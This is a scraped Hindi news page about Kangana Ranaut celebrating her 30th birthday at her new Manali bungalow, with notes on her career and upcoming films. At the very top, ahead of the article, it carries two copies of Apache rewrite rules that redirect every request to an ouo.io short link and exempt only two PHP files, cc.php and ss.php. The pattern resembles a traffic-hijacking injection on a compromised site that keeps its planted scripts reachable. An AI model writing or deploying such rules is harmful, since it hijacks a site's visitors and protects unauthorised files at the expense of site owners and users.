
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 640
Previous Nextमनाली। इन दिनों मीडिया की सुर्खियों में छाईं कंगना रनोट आज (23 मार्च को) अपनी जिंदगी के 30 साल पूरे कर रही हैं और 31वें साल में प्रवेश करेंगी। इस बार कंगना अपना जन्मदिन मनाने के लिए मनाली पहुंची हैं। कंगना कल शाम दिल्ली से सीधे मनाली पहुंची हैं। कंगना ने मनाली में कुछ वक्त पहले ही अपने लिए एक नया बंगला बनवाया है। इसी बंगले में कंगना का जन्मदिन मनाया जाएगा। कंगना ने यहां पहुंचकर अपने स्टाफ के साथ बागबानी के काम में हाथ बंटाया। कंगना को बागबानी का शौक रहा है। इस बंगले के लिए सभी पौधे उन्होंने खुद लगवाए हैं। जन्मदिन मनाने के लिए तैयारियां हो गई हैं। कंगना का परिवार भी मनाली पहुंच चुका है। सूत्र बताते हैं कि कंगना के जन्मदिन के लिए मुंबई से भी उनके कुछ दोस्त मनाली पहुंचे हैं। उनके साथ शाम को बंगले पर ही डिनर का इंतजाम किया गया है।
कंगना के एक दोस्त ने बताया कि कंगना जन्मदिन पर पियानो बजाएंगी, जिसके लिए उन्होंने ट्रेनिंग ली है। जन्मदिन के बाद कंगना मुंबई लौटेंगी, जहां वे मणिकर्णिका का अगला शेड्यूल करेंगी और इसके बाद बालाजी के साथ अपनी अगली फिल्म 'मेंटल' शुरू करेंगी, जिसमें वे राजकुमार राव के साथ जोड़ीदार हैं।
कंगना का जन्म 23 मार्च, 1987 को हिमाचल प्रदेश में हुआ था। दिल्ली में अस्मिता थिएटर ग्रुप के साथ उन्होंने अपने अभिनय कैरियर की शुरुआत की। कंगना ने रंगमंच निर्देशक अरविन्द गौड़ के अंतर्गत प्रशिक्षण प्राप्त किया। अरविन्द गौड़ के साथ उनका पहला नाटक गिरीश कर्नाड का रक्त कल्याण था। 2014 में आई फिल्म क्वीन में अपने जबरदस्त अभिनय के कारण कंगना को बॉलीवुड की क्वीन भी कहा जाता है। 28 मार्च 2016 को, ‘तनु वेड्स मनु रिटर्न्स’में शानदार अभिनय के लिए कंगना को राष्ट्रीय पुरस्कार दिया गया।